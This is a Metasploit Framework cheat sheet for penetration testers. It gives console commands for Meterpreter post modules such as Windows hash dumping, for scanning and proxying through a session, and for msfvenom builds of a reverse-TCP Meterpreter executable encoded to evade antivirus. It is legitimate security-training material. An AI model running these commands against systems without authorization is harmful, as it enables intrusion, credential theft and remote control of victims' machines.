Metasploit Cheat Sheet


By Yori Kvitchko, Tom Hessman, Daniel Pendolino, & Ed Skoudis
POCKET REFERENCE GUIDE
resources/

Purpose

The purpose of this cheat sheet is to describe some common options for some of the various components of the Metasploit Framework.

Tools Described on This Sheet

Metasploit
The Metasploit Framework is a development platform for developing and using security tools and exploits.

Metasploit Meterpreter
The Meterpreter is a payload within the Metasploit Framework that provides control over an exploited target system, running as a DLL loaded inside of any process on a target machine.

Metasploit msfvenom
The msfvenom tool is a component of the Metasploit Framework that allows users to generate a standalone version of any payload within the framework. Payloads can be generated in a variety of formats including executable, Ruby script, and raw shellcode. The msfvenom tool can also encode payloads to help avoid detection.

Meterpreter Post Modules

With an available Meterpreter session, post modules can be run on the target machine.

Post Modules from Meterpreter
meterpreter > run post/multi/gather/env

Post Modules on a Backgrounded Session
msf > use post/windows/gather/hashdump
msf > show options
msf > set SESSION 1
msf > run

Useful Auxiliary Modules

Port Scanner:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run

DNS Enumeration
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run

FTP Server
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run

Proxy Server
msf > use auxiliary/server/socks4
msf > run

Any proxied traffic that matches the subnet of a route will be routed through the session specified by route. Use proxychains configured for socks4 to route any application's traffic through a Meterpreter session.

msfvenom

The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the former msfpayload and msfencode tools. Run with '-l payloads' to get a list of payloads.

$ msfvenom -p [PayloadPath] -f [FormatType] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]

Example
Reverse Meterpreter payload as an executable and redirected into a file:
$ msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=10.1.1.1 LPORT=4444 > met.exe

Format Options (specified with -f)
--help-formats – List available output formats
exe – Executable
pl – Perl
rb – Ruby
raw – Raw shellcode
c – C code

Encoding Payloads with msfvenom

The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with '-l encoders' to get a list of encoders.

$ msfvenom -p [Payload] -e [Encoder] -f [FormatType] -i [EncodeIterations] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]

Example
Encode a payload from msfpayload 5 times using shikata-ga-nai encoder and output as executable:
$ msfvenom -p windows/meterpreter/reverse_tcp -i 5 -e x86/shikata_ga_nai -f exe LHOST=10.1.1.1 LPORT=4444 > mal.exe
